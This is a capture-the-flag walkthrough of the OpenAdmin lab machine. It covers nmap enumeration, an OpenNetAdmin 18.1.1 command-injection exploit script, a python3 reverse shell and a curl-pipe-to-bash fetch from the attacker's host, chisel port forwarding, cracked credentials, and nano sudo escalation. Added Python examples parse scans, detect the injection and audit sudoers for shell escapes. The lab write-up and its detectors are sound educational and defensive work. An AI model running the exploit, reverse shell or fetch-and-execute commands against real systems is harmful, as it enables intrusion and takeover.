Link to the box: OpenAdmin
Enumeration (NMAP)
```
nmap -p- -vvv -n --min-rate 5000 -T5 10.10.10.171 -oN ports
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-18 22:20 EST
Initiating Ping Scan at 22:20
Scanning 10.10.10.171 [2 ports]
Completed Ping Scan at 22:20, 0.16s elapsed (1 total hosts)
Initiating Connect Scan at 22:20
Scanning 10.10.10.171 [65535 ports]
Discovered open port 22/tcp on 10.10.10.171
Discovered open port 80/tcp on 10.10.10.171
Increasing send delay for 10.10.10.171 from 0 to 5 due to 41 out of 102 dropped probes since last increase.
Warning: 10.10.10.171 giving up on port because retransmission cap hit (2).
Completed Connect Scan at 22:20, 31.81s elapsed (65535 total ports)
Nmap scan report for 10.10.10.171
Host is up, received syn-ack (0.16s latency).
Scanned at 2021-11-18 22:20:14 EST for 32s
Not shown: 33951 filtered ports, 31582 closed ports
Reason: 33951 no-responses and 31582 conn-refused
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 32.03 seconds
```
```
nmap -p22,80 -sC -sV 10.10.10.171 -oN scan
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-18 22:21 EST
Nmap scan report for 10.10.10.171
Host is up (0.16s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.90 seconds
```
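The two scans above are the kind of -oN output you end up with for every host in an engagement, and the same banners are what a defender wants in an inventory. The following Python parser is an added example, not part of the original writeup: it turns nmap normal-format text into structured service records (host, port, state, product/version, NSE script results) so the banners can be fed into a version-tracking or exposure check. SAMPLE_SCAN is a constructed copy of the scan above; the Service dataclass and the function names are my own.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: a trimmed copy of the -oN style output shown above.
SAMPLE_SCAN = """\
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-18 22:21 EST
Nmap scan report for 10.10.10.171
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap done: 1 IP address (1 host up) scanned in 16.90 seconds
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
SCRIPT_RE = re.compile(r"^\|_?\s*([\w-]+):\s*(.*)$")   # NSE script result lines


@dataclass
class Service:
    host: str
    port: int
    proto: str
    state: str
    name: str
    version: str
    scripts: dict = field(default_factory=dict)


def parse_nmap_normal(text):
    """Parse nmap 'normal' (-oN) output into Service records."""
    host, services = None, []
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
            continue
        m = PORT_RE.match(line)
        if m:
            services.append(Service(host, int(m.group(1)), m.group(2), m.group(3),
                                    m.group(4), (m.group(5) or "").strip()))
            continue
        m = SCRIPT_RE.match(line)
        if m and services:
            # a script result belongs to the most recent port line
            services[-1].scripts[m.group(1)] = m.group(2)
    return services


def exposed_inventory(services):
    """Map 'host:port/proto' -> version banner, open ports only."""
    return {f"{s.host}:{s.port}/{s.proto}": s.version
            for s in services if s.state == "open"}


if __name__ == "__main__":
    for key, banner in exposed_inventory(parse_nmap_normal(SAMPLE_SCAN)).items():
        print(key, banner)
```

Feeding the saved `ports` and `scan` files through `parse_nmap_normal` gives you the same dictionary for every host, which is the point at which an outdated banner such as the Apache 2.4.29 one above becomes a trackable finding rather than a line in a text file.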
Exploitation
After running dirsearch I found that the box is running a system called OpenNetAdmin, version 18.1.1. Searching searchsploit turns up an RCE exploit for it, or you can just copy the sh code below:
```bash
#!/bin/bash
# Interactive wrapper around the OpenNetAdmin 18.1.1 command injection:
# each command typed at the prompt is spliced into the xajaxargs[] "ip=>" parameter.
URL="${1:-http://10.10.10.171/ona/}"   # target from the first argument, defaulting to the box
while true; do
    echo -n "$ "; read -r cmd
    # BEGIN/END markers let sed cut the command output out of the HTML response
    curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" \
        | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
```
Take a look at the URL.
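From the defender's side, the injection above is visible in the xajaxargs[] values of the POST body, where a shell separator shows up inside the ip=> argument. The Python check below is an added example, not code from the writeup or from OpenNetAdmin: it decodes a form-encoded request body the way a WAF or audit-log processor would see it and flags xajaxargs[] values that carry shell metacharacters. Both request bodies are constructed samples, and the function names are assumptions of this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample POST bodies (application/x-www-form-urlencoded), not captured traffic.
# The parameter layout mirrors the request the script above sends to /ona/.
BENIGN_BODY = ("xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips"
               "&xajaxargs[]=ip%3D%3E10.0.0.5&xajaxargs[]=ping")
INJECTED_BODY = ("xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips"
                 "&xajaxargs[]=ip%3D%3E;id&xajaxargs[]=ping")

# Shell metacharacters that have no business inside an xajax argument.
# '>' is deliberately absent: xajax itself encodes arguments as "name=>value".
SHELL_META = re.compile(r"[;&|`$\n]|\$\(")


def parse_form_body(body):
    """Decode a form-encoded body into {name: [values]}.

    Done by hand rather than with urllib.parse.parse_qs so that ';' is never
    treated as a pair separator (older Python versions did that), because the
    ';' is exactly the character we want to keep and inspect.
    """
    params = {}
    for pair in body.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def xajax_injection_indicators(body):
    """Return the xajaxargs[] values that contain shell metacharacters."""
    params = parse_form_body(body)
    return [v for v in params.get("xajaxargs[]", []) if SHELL_META.search(v)]


def triage(bodies):
    """Label each body 'alert' or 'ok' for use in a log-processing loop."""
    return ["alert" if xajax_injection_indicators(b) else "ok" for b in bodies]


if __name__ == "__main__":
    for body in (BENIGN_BODY, INJECTED_BODY):
        print(triage([body])[0], xajax_injection_indicators(body))
```

Because the payload travels in the POST body, a plain Apache access log will not show it; the check has to run where the body is available, such as a ModSecurity audit log or a reverse proxy that inspects form data. The safer fix remains upgrading OpenNetAdmin past 18.1.1 so the parameter is never passed to a shell.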
After some tries, this got me the shell; the box is using python3.
```bash
# On the attacking machine: start the listener and serve the payload over HTTP
nc -lvnp 4444
python3 -m http.server

# The payload served as emanlui.py: a python3 reverse shell back to 10.10.14.31:4444
python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.31",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

# Run on the target through the command injection: fetch the script and execute it
curl 10.10.14.31:8000/emanlui.py | bash
```
Inside the local/config folder there is a database config file where we can find jimmy's password for SSH:

```
n1nj4W4rri0R!
```
There is an internal folder that is only accessible to jimmy. If we curl it we can get the SSH key for joanna's session. In this case no port forwarding is needed because we can get the flag directly, but if it were, we could crack the SHA hash found in the index, log into jimmy's account and get the SSH key from there.
```bash
# on the attacking machine
./chisel server --reverse -p 1234

# on the target: expose its local port 52846 on the attacker's 127.0.0.1:52846
./chisel client 10.10.14.31:1234 R:127.0.0.1:52846:127.0.0.1:52846
```
OR, you can do the following steps from the existing SSH session:

```
Enter, then ~C        # opens the ssh> escape prompt
ssh> -L 52846:127.0.0.1:52846
```

This uses the current session to port-forward the traffic.
Getting the SSH key: the key is passphrase-protected, so we need to crack it with ssh2john:

https://raw.githubusercontent.com/openwall/john/bleeding-jumbo/run/ssh2john.py

And we get the password:

```
joanna:bloodninjas
```
Now we have sudo access to nano; following the steps at the link below we can find the flag.

https://gtfobins.github.io/gtfobins/nano/
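The final step works because a sudo rule lets a user run nano as root, and GTFOBins documents nano as a shell escape. As an added example (not from the writeup), the Python below parses a sudoers file and reports every rule that grants such a binary, so the misconfiguration can be caught in a host audit before anyone else finds it. SAMPLE_SUDOERS is a constructed file, not the one from the box; SHELL_ESCAPE_BINS lists nano (the binary on this page) plus a few other well-known GTFOBins sudo entries.

```python
import re

# Constructed sample sudoers file; not the one on the box.
SAMPLE_SUDOERS = """\
# User privilege specification
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
joanna  ALL=(ALL) NOPASSWD: /bin/nano /opt/example/notes.txt
%admin  ALL=(ALL) ALL
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart myapp
"""

# nano is the binary on this page; the rest are other well-known GTFOBins sudo entries
# (a small subset added here; extend it from the site as needed).
SHELL_ESCAPE_BINS = {"nano", "vim", "vi", "less", "more", "python3", "perl", "bash", "sh"}

# user  host=(runas) [TAG:]cmd, cmd...
RULE_RE = re.compile(r"^(\S+)\s+(\S+)\s*=\s*(?:\(([^)]*)\)\s*)?(.*)$")


def parse_sudoers(text):
    """Parse user specification lines into dicts; Defaults and comments are skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        user, host, runas, cmdspec = m.groups()
        tags, cmds = set(), []
        for part in cmdspec.split(","):
            part = part.strip()
            # leading tags such as NOPASSWD: or SETENV: precede the command
            while ":" in part and part.split(":", 1)[0].strip().isupper():
                tag, part = part.split(":", 1)
                tags.add(tag.strip())
                part = part.strip()
            cmds.append(part)
        rules.append({"user": user, "host": host, "runas": runas or "root",
                      "tags": tags, "cmds": cmds})
    return rules


def find_shell_escapes(rules):
    """Return (user, command, nopasswd) for rules granting a shell-escape binary."""
    hits = []
    for r in rules:
        for cmd in r["cmds"]:
            if not cmd or cmd == "ALL":
                continue   # unrestricted sudo is its own finding, not a GTFOBins case
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if binary in SHELL_ESCAPE_BINS:
                hits.append((r["user"], cmd, "NOPASSWD" in r["tags"]))
    return hits


if __name__ == "__main__":
    for user, cmd, nopasswd in find_shell_escapes(parse_sudoers(SAMPLE_SUDOERS)):
        print(f"{user}: {cmd} (NOPASSWD={nopasswd})")
```

Restricting nano to one file, as the sample rule does, does not help: the editor still runs as root and can open a shell from inside. The fix is to grant a purpose-built command instead of an interactive editor, which is the kind of rule the deploy entry in the sample shows.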